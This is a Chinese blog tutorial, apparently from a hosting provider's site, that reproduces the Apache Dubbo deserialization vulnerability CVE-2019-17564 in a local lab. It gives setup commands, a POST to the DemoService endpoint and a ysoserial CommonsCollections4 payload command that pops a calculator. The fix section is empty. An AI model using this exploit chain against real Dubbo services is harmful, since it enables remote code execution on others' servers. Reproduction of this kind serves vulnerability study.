您好,登錄后才能下訂單哦!
如何分析Apache Dubbo反序列漏洞CVE-2019-17564,相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策,為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。
Apache Dubbo是一款高性能、輕量級(jí)的開(kāi)源Java RPC框架,它提供了三大核心能力:面向接口的遠(yuǎn)程方法調(diào)用,智能容錯(cuò)和負(fù)載均衡,以及服務(wù)自動(dòng)注冊(cè)和發(fā)現(xiàn)。
Apache Dubbo HTTP協(xié)議中的一個(gè)反序列化漏洞(CVE-2019-17564),該漏洞的主要原因在于當(dāng)Apache Dubbo啟用HTTP協(xié)議之后,Apache Dubbo對(duì)消息體處理不當(dāng)導(dǎo)致不安全反序列化,當(dāng)項(xiàng)目包中存在可用的gadgets時(shí)即可導(dǎo)致遠(yuǎn)程代碼執(zhí)行。
0x04 環(huán)境搭建
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz# 將conf目錄下的zoo_sample.cfg改名為zoo.cfgmv zoo_sample.cfg zoo.cfg# 進(jìn)入bin目錄啟動(dòng)zookeeper./zkServer.sh start
git clone https://github.com/apache/dubbo-samples# 進(jìn)入到dubbo-samples-http目錄中,修改pom.xmlvim pom.xml
<dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency>
mvn clean packagemvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
0x05 漏洞利用
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080
paylaod
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
burp發(fā)包,彈出計(jì)算器
0x06 修復(fù)方式
看完上述內(nèi)容,你們掌握如何分析Apache Dubbo反序列漏洞CVE-2019-17564的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。